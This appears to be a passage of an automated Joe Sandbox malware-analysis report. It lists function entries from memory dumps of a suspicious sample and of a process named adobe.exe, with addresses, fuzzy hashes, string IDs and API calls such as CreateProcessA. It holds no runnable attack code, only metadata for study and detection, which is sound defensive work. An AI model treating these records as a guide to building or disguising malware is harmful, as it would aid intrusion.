Opcode Fuzzy Hash: cac71c64b68b996d93f016c75357df47d1ed78d2be4ab551195fcbd12cb59001
Instruction Fuzzy Hash: BD216D75F006259FDB50DFA9D990AAEBBF1EB88350F108069E945EB354EB30D941CB90

Function 06633AF8 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa5327e2d1a6e7e494b3746635af55bb4087128def040bab56138c10de73104a
Instruction ID: 18bd997b44a0085b736c4f9a89f7faf6ab1775acfc7a5e384783bd6a57a043f0
Opcode Fuzzy Hash: aa5327e2d1a6e7e494b3746635af55bb4087128def040bab56138c10de73104a
Instruction Fuzzy Hash: E9219D75F006259FDB40DF69D990AAEBBF1EB88750F108069E906EB394EB30D941CB90

Function 00B4D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4034263260.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b4d000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 787a6b0b5114ce373f6e09b5f079bd187f3b1a0d6a3592740e0e0ca126d032b2
Instruction ID: d51194de83e2344f20f1f393af67ec5d0f62e5e0409f3e7b7249b8ddb57b0641
Opcode Fuzzy Hash: 787a6b0b5114ce373f6e09b5f079bd187f3b1a0d6a3592740e0e0ca126d032b2
Instruction Fuzzy Hash: F72122B1604200DFCB10DF14D9D0B26BBE5FB88314F24CAADE9094B392C33AD907DA62

Function 00B4D118 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4034263260.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b4d000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8e4c34c028640ec089b0b8a10a27ae9d3f2c9cbaa4079f8c780120dd7da9893
Instruction ID: 683c87f90b5b1fe0bcca36ac0fe8d449def606e79bc97cfb072a7d7dbfe894bb
Opcode Fuzzy Hash: d8e4c34c028640ec089b0b8a10a27ae9d3f2c9cbaa4079f8c780120dd7da9893
Instruction Fuzzy Hash: E42101B1604240DFDB04DF14C9C0B26BBE6FB88718F24C6ADEC095B292C33AD946D661

Function 06636960 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4acc730d49d598cef3c8d87e24f04364e45b53d670b7e78ea10301db20a618a4
Instruction ID: d77561a8bc10b9669c72e553b0f40cd6dd20fb9a93bf60fee61e6000fa642dcf
Opcode Fuzzy Hash: 4acc730d49d598cef3c8d87e24f04364e45b53d670b7e78ea10301db20a618a4
Instruction Fuzzy Hash: 61217230F10129ABDF44EBA9E96469EB7B7EF84310F14842AD405DB394EB31ED418B84

Function 0663FC9A Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48f754bcd24036e18c4cc2202e0f8b72339219a38fd062011e58c55e3aa784c5
Instruction ID: 313cedfc30caba06c21a1f95185e70265a91f28ee896d60efdfe2333a43a3564
Opcode Fuzzy Hash: 48f754bcd24036e18c4cc2202e0f8b72339219a38fd062011e58c55e3aa784c5
Instruction Fuzzy Hash: B111A771D207594BDF60CEA9C8842DFFBB5EF86310F104527E905EB300D77194958752

Function 06633C08 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e223a52a605d03a915ae4bc4b901d10027f6fbd4be4ec8b66a9d61d740c5b965
Instruction ID: a01a5f62aac63a65a3927d252bec54cce95d3fb24ba14b1dc5816a700ebab662
Opcode Fuzzy Hash: e223a52a605d03a915ae4bc4b901d10027f6fbd4be4ec8b66a9d61d740c5b965
Instruction Fuzzy Hash: CF11A132F105354FCF54AA79D8146AE73EBEBC9610B004439D506E7358EE65DC028BD5

Function 06633E3F Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99803484224b0b9ee94c7d337985e2284464d73119390c796bf5522f7cc0a23a
Instruction ID: 48033889e92e333b404ebdc950bd37cd20aed7cfcadd6f4846c96cdc5ebc6a7f
Opcode Fuzzy Hash: 99803484224b0b9ee94c7d337985e2284464d73119390c796bf5522f7cc0a23a
Instruction Fuzzy Hash: 8A01B139B142A20FDB559679D4A172EBBD6DBC9720F11847FE40ACB391EA24DC024396

Function 0663EDF1 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9ecf68f556a29967ead6e7258b0f44edbddb6900443da98f49a07e1ca0f3738
Instruction ID: 0bc8ff7d877dd3cdc7f3dd0ba22c1e4325f5dc9129cb556a48fddd0633f8b002
Opcode Fuzzy Hash: f9ecf68f556a29967ead6e7258b0f44edbddb6900443da98f49a07e1ca0f3738
Instruction Fuzzy Hash: CC012B357042610BCB659A7DD89472FBBD6DBC9720F14843BF40ACB342DD26DC428396

Function 00B4D02B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4034263260.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b4d000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
Instruction ID: a3d128cf6429e1d9ed95a2f1b840f6d51d34dedab522078283683415f990ad24
Opcode Fuzzy Hash: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
Instruction Fuzzy Hash: 7511BB75504280DFDB12CF14D5D0B15BBA1FB84314F28C6AED8494B756C33AD84ACB62

Function 06639F50 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dd4e15b6c47573078d5919fbe59200c1e6d0d4062bdd2984d1d9dfc811f8282
Instruction ID: f04f93dcca3663430a61c0206daec1b209231744b88e284b8a202d9b2b0c08bf
Opcode Fuzzy Hash: 1dd4e15b6c47573078d5919fbe59200c1e6d0d4062bdd2984d1d9dfc811f8282
Instruction Fuzzy Hash: 7C014731B042200FDB659A78E850B5F7BE5DBC5710F14852EF00ACB394EA61DC42C781

Function 00B4D113 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4034263260.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b4d000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e08d273bc19f3b3ab6564e8c8f805518653f541784c48cdb785afd743e373b6
Instruction ID: 47739f6c644ba446bbb649275bcc143c0e451195d250ad6b5b0df1ba36ea185a
Opcode Fuzzy Hash: 4e08d273bc19f3b3ab6564e8c8f805518653f541784c48cdb785afd743e373b6
Instruction Fuzzy Hash: 8211B875504280CFDB06CF10C9C0B15BFA2FB84318F24C6AEDC494B6A2C33AD94ACB92

Function 06633BF9 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e5fb003de66af0fc9373d84acce0b87903425e184d1e186d7bb048b50aefcc2
Instruction ID: fddce482b21de425acbbb590d05ad2a73a4651baea61a32bd7cceb8485dcacd1
Opcode Fuzzy Hash: 2e5fb003de66af0fc9373d84acce0b87903425e184d1e186d7bb048b50aefcc2
Instruction Fuzzy Hash: F801A236F101354FDF54A669ED246EF72EBDBC8210F00413AE506E7354EE248C0287D5

Function 066338C0 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 097076136b93b208e285a36f2982ef7b3aaf2019cd35a9670ea52b520ea804ee
Instruction ID: c35ba9ff9fd361e6b420c51bd722ac43c3b190c301343e98d6c4fbcad3e69b0a
Opcode Fuzzy Hash: 097076136b93b208e285a36f2982ef7b3aaf2019cd35a9670ea52b520ea804ee
Instruction Fuzzy Hash: 1121C3B5D00259DFDB10CF9AD984ADEFBF4FB48320F10862AE518A7340D7785544CBA5

Function 066338C8 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64ccfe7e51aa7ef533d1207a5af97fd63c34c6854780b2b26b29f3c6ad079fa9
Instruction ID: fd01fa9aa74a78d2a8ef59f60dbfc0ce07303448bafe506996546de5a479e247
Opcode Fuzzy Hash: 64ccfe7e51aa7ef533d1207a5af97fd63c34c6854780b2b26b29f3c6ad079fa9
Instruction Fuzzy Hash: 2C11C2B5D00259DFCB10CF9AD884ADEFBF8FB48320F10812AE918A7340D3746544CBA5

Function 06633E50 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e76c8efef45507ba523cd0c7028f1fbc0c04e8d2f2fb2c9241615b63c7cfa514
Instruction ID: 1d8627ae1f6d9eea7b675dbfaad32b4425e1e96636841c91bd7eaa5d1e54350e
Opcode Fuzzy Hash: e76c8efef45507ba523cd0c7028f1fbc0c04e8d2f2fb2c9241615b63c7cfa514
Instruction Fuzzy Hash: 0401F434B101A20BDB64957ED451B1FB6DACBC8B20F20883EF10ECB384ED25DC024386

Function 0663EE00 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c3030900acdf5af390c4ac98f2598d20d621ec71034b3c4a2901187c5ca1fe9
Instruction ID: 2de13ce566f7ee24d524b54e00fc43c24a8441e091348b33747067e6b996abb5
Opcode Fuzzy Hash: 7c3030900acdf5af390c4ac98f2598d20d621ec71034b3c4a2901187c5ca1fe9
Instruction Fuzzy Hash: F201A435B106210BCB64957ED49472FB7DADBC9720F10843AF50ACB351ED26DC024395

Function 06639F60 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bd5d422c602ccbdafb7f0f432a7f87c48def5607cbdec53d17cea9f61dbf4f2
Instruction ID: fc4055e45b25c19dae28adb232ff3822195e3533ca320d4f5bb7ec9da21899f3
Opcode Fuzzy Hash: 5bd5d422c602ccbdafb7f0f432a7f87c48def5607cbdec53d17cea9f61dbf4f2
Instruction Fuzzy Hash: 87018131B101250BDB649A69E450B1F77DAEBC9750F10852DF10ACB344EE61DC42CBC5

Function 0663C830 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 001d2a608df15da460a89b87c1d7069faefe174a995581711d22fda74515a74a
Instruction ID: d452acbfa38053e5e1d0f92b41d555773144558861661565639d01e73c39dbb2
Opcode Fuzzy Hash: 001d2a608df15da460a89b87c1d7069faefe174a995581711d22fda74515a74a
Instruction Fuzzy Hash: C4F0A032E20278ABDB54A976EC00A9AB77AE784754F004439FD01FB344EA71A901C7C0

Function 066360B9 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d1d40d7654b9e0f39359457fa5136ad7c3057391b0982cf33f6c130d6ecb71a
Instruction ID: dcd4353c8737b0012c3b93da46383308ddebc0fb13069350795150041a423035
Opcode Fuzzy Hash: 1d1d40d7654b9e0f39359457fa5136ad7c3057391b0982cf33f6c130d6ecb71a
Instruction Fuzzy Hash: 65E04F71E1426CABDF50CFB0CB4A35E77A9EB42204F3189BAD404DB242E237C9018780

Non-executed Functions

Function 066372E8 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$eq, xrefs: 06637430
$eq, xrefs: 066377B0
$eq, xrefs: 066373FF
$eq, xrefs: 0663785B
$eq, xrefs: 066377BC
$eq, xrefs: 06637871
$eq, xrefs: 06637424
$eq, xrefs: 06637865
$eq, xrefs: 066373F3
$eq, xrefs: 0663784F

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-2049195972
Opcode ID: 35f791750e0387792dd0efc15650be469dc22101c7954c58ca7276fdb6f00a7d
Instruction ID: 5a907c3b0bec281f184a21dd982104869df694ac39c657723aa72eeff4419eeb
Opcode Fuzzy Hash: 35f791750e0387792dd0efc15650be469dc22101c7954c58ca7276fdb6f00a7d
Instruction Fuzzy Hash: 69122D70E01229DFDB64DF65C994A9EBBF2BF89300F208569D40AAB365DB309D41CF85

Function 0663A580 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$eq, xrefs: 0663A732
$eq, xrefs: 0663A708
$eq, xrefs: 0663A676
$eq, xrefs: 0663A6FC
$eq, xrefs: 0663A682
$eq, xrefs: 0663A73E
$eq, xrefs: 0663A6D1
$eq, xrefs: 0663A6DD

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-1110479544
Opcode ID: 7451a8c5d0e31e01b53fc2abb1fb28a672ef3731a6554b415e52b4ba95088bb0
Instruction ID: 3823433eeca1268f087546cc6a8fd363b726fcde6441b3b26c2641e22e314057
Opcode Fuzzy Hash: 7451a8c5d0e31e01b53fc2abb1fb28a672ef3731a6554b415e52b4ba95088bb0
Instruction Fuzzy Hash: AD915F30E10219DFEBA4EFA5D594B6E7BF2EF44300F108529E4419B394DB759842DB91

Function 06636CE8 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$eq, xrefs: 06637024
.5}q, xrefs: 06636D43
$eq, xrefs: 06637184
$eq, xrefs: 06637030
$eq, xrefs: 066371F0
$eq, xrefs: 06636FCA
$eq, xrefs: 066371FC

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID: .5}q$$eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-1622854337
Opcode ID: 0e6226d613c5792a6b4e58338ded34aaef03c18e0b9401b6790d5cdcee73a333
Instruction ID: 1f3dc6efcc514832808bcd8fe03054d464e3c2c094b2ca312f8fe3ab58b16ba7
Opcode Fuzzy Hash: 0e6226d613c5792a6b4e58338ded34aaef03c18e0b9401b6790d5cdcee73a333
Instruction Fuzzy Hash: E3F16D70B11218CFDB54EFA5D594A6EBBF2FF88300F248568E4059B399DB35AC42CB84

Function 0663BA58 Relevance: 7.7, Strings: 6, Instructions: 197COMMON

Download Yara Rule

Strings

$eq, xrefs: 0663BC25
$eq, xrefs: 0663BC31
$eq, xrefs: 0663BBF1
$eq, xrefs: 0663BC59
$eq, xrefs: 0663BBFD
$eq, xrefs: 0663BC65

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq$$eq$$eq
API String ID: 0-220072568
Opcode ID: cf6372178526839012ebdfabf7791800de20f0a2f7a825f2ccde4a9fefe38095
Instruction ID: 1c00c848dfb3ad1dbd9087da51b38aa489bbe45d2ade513b3f1aaac6cc36470b
Opcode Fuzzy Hash: cf6372178526839012ebdfabf7791800de20f0a2f7a825f2ccde4a9fefe38095
Instruction Fuzzy Hash: 09718E30E102298FDBA8DFA9D98066EB7B2EF94300F24446AD406DF354EF719942CB81

Function 06638018 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$eq, xrefs: 0663827E
$eq, xrefs: 06638272
$eq, xrefs: 066382E3
$eq, xrefs: 066382D7

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq
API String ID: 0-812946093
Opcode ID: d1177903f12dda20c20ba8bd639931432c31938484d5204cee5da8ae6d7bf6a9
Instruction ID: de7ff730bc4e1c91a87ee41f8897684e2e4e9b9c4becd07119a70c6680c03a94
Opcode Fuzzy Hash: d1177903f12dda20c20ba8bd639931432c31938484d5204cee5da8ae6d7bf6a9
Instruction Fuzzy Hash: 49B13A30A11219CFDB94EFA9D9946AEB7F2EF84300F24856DE4059B395DB75DC82CB80

Function 06638430 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

LReq, xrefs: 06638572
$eq, xrefs: 066384BB
$eq, xrefs: 066384AF
LReq, xrefs: 06638523

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID: LReq$LReq$$eq$$eq
API String ID: 0-731573373
Opcode ID: dcfe18139748ab1795783e1fa84baa8414c13da6cdad1cab09f9df91773678fa
Instruction ID: 76e19962e3bc9705497887ab90775b32e220575fea0f80f69ad1508243d8cbbb
Opcode Fuzzy Hash: dcfe18139748ab1795783e1fa84baa8414c13da6cdad1cab09f9df91773678fa
Instruction Fuzzy Hash: 26517F30B002159FDB54EB29D990AAA77F6FF89700F14856DF4169F3A6EA30EC41CB91

Function 0663A902 Relevance: 5.2, Strings: 4, Instructions: 160COMMON

Download Yara Rule

Strings

$eq, xrefs: 0663AA84
$eq, xrefs: 0663AA31
$eq, xrefs: 0663AAB3
$eq, xrefs: 0663AADC

Memory Dump Source

Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd

Similarity

API ID:
String ID: $eq$$eq$$eq$$eq
API String ID: 0-812946093
Opcode ID: 143c138302ede57d517e8363bfce5b878ce0b05b8703d3bf9ddc6c30622ffda4
Instruction ID: 674bb408b26a197d7c62c1d98ca17794ddad11f9e775c7d217ea96c926b9de6d
Opcode Fuzzy Hash: 143c138302ede57d517e8363bfce5b878ce0b05b8703d3bf9ddc6c30622ffda4
Instruction Fuzzy Hash: E951B031E202158FCF65DFA4D6906AEB7F2EB85310F14856AE486EB394DB31DC42DB81

Analysis Process: adobe.exePID: 516, Parent PID: 2592COMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	209
Total number of Limit Nodes:	16

Executed Functions

Function 05673D90 Relevance: 2.7, Strings: 2, Instructions: 211
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hiq, xrefs: 05673E58
Hiq, xrefs: 05673EBE

Memory Dump Source

Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5670000_adobe.jbxd

Similarity

API ID:
String ID: Hiq$Hiq
API String ID: 0-2624443307
Opcode ID: 065d57cc5d82578715581e3cec15f35b4f69725561abc9f15711f49c16655267
Instruction ID: 368010a8a601af2fb27aa13bd5d09d82c75769409e58cd516510d31cda55d8ef
Opcode Fuzzy Hash: 065d57cc5d82578715581e3cec15f35b4f69725561abc9f15711f49c16655267
Instruction Fuzzy Hash: 71816A70E002598FCF14DFA9C8946EEBBF6BF88310F24852AE409EB354DB745945CBA1

Function 055995B4 Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 055997F6

Memory Dump Source

Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5590000_adobe.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2f89be989351cfa1eecd1ecb5db705a29c3808a0b52c0f26897db26acad08715
Instruction ID: 5998f255233cdc0227d1f1aa23350d5ceb499e06d6eb691a6c865b8d9f8f290d
Opcode Fuzzy Hash: 2f89be989351cfa1eecd1ecb5db705a29c3808a0b52c0f26897db26acad08715
Instruction Fuzzy Hash: 0BA15971D002599FEF24CFA9C841BEDBBB2FF48310F14856AE809A7250DB799985CF91

Function 055995C0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 055997F6

Memory Dump Source

Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5590000_adobe.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 41cef98149b0ca4c6e014c3502c471c902d80f2f45bbff191d7a33840cc56bc4
Instruction ID: 3c96b1b162bd285aa0d0fc45483d487779dc5d77b5609f79388e051811463a24
Opcode Fuzzy Hash: 41cef98149b0ca4c6e014c3502c471c902d80f2f45bbff191d7a33840cc56bc4
Instruction Fuzzy Hash: 1B916971D002599FEF24CFA9C841BEDBBB2FF48310F14856AE809A7250DB799985CF91

Function 0144B0B0 Relevance: 1.7, APIs: 1, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0144B306

Memory Dump Source

Source File: 00000004.00000002.1704626254.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1440000_adobe.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 86a175490372c32b3b92fff0803ccc7d3a41f4ea6588347d98525d27c4361bbd
Instruction ID: 5cbe836d0256d9d51107d797c29cdce873def17e387365294b5b23f7e4f9f46d
Opcode Fuzzy Hash: 86a175490372c32b3b92fff0803ccc7d3a41f4ea6588347d98525d27c4361bbd
Instruction Fuzzy Hash: A87134B0A00B058FE724DF6AD54475BBBF1FF88240F10892ED58A9BB60D774E849CB91

Function 05590BE4 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05594381

Memory Dump Source

Source File: 00000004.00000002.1705814509.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5590000_adobe.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: b728cfe2cc2115a25684883b88b637bf5ab4edf36a420cda03b25bd1921421f3
Instruction ID: fd7d2699e0ea6c0fe76cc6e6c13fe345cb918c24c77100b8e08b0cf99ea3cd3d
Opcode Fuzzy Hash: b728cfe2cc2115a25684883b88b637bf5ab4edf36a420cda03b25bd1921421f3
Instruction Fuzzy Hash: 6F4108B4900245CFCB14CF99C448AAEBBF5FF88314F248959D519AB361D775A841CFA0

Function 01444248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 014459C9

Memory Dump Source

Source File: 00000004.00000002.1704626254.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1440000_adobe.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: de9ee1e3f2d51384fba744458e729a509dd3ed6fd68bb088280112a323304d91
Instruction ID: b5e2e4a50f69e0b4a656e50477ee0e652bf177c7025acd0b5f4ead79c746aa97
Opcode Fuzzy Hash: de9ee1e3f2d51384fba744458e729a509dd3ed6fd68bb088280112a323304d91
Instruction Fuzzy Hash: BC41CFB4D00719CBEF24DFAAC884A9EBBB5BF49314F20805AD408AB251DB756946CF90

Function 0144590D Relevance: 1.6, APIs: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 014459C9

Memory Dump Source

Source File: 00000004.00000002.1704626254.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1440000_adobe.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 74c8e7a8bababb4ecddf3aa1c7dbff48636827ada15ac1e47f0e0cc71e21abb9
Instruction ID: f2dd2a42ce1de4197c1b9636c8920ee7f335f336730226ee4c2dbfbfb035f4a9
Opcode Fuzzy Hash: 74c8e7a8bababb4ecddf3aa1c7dbff48636827ada15ac1e47f0e0cc71e21abb9
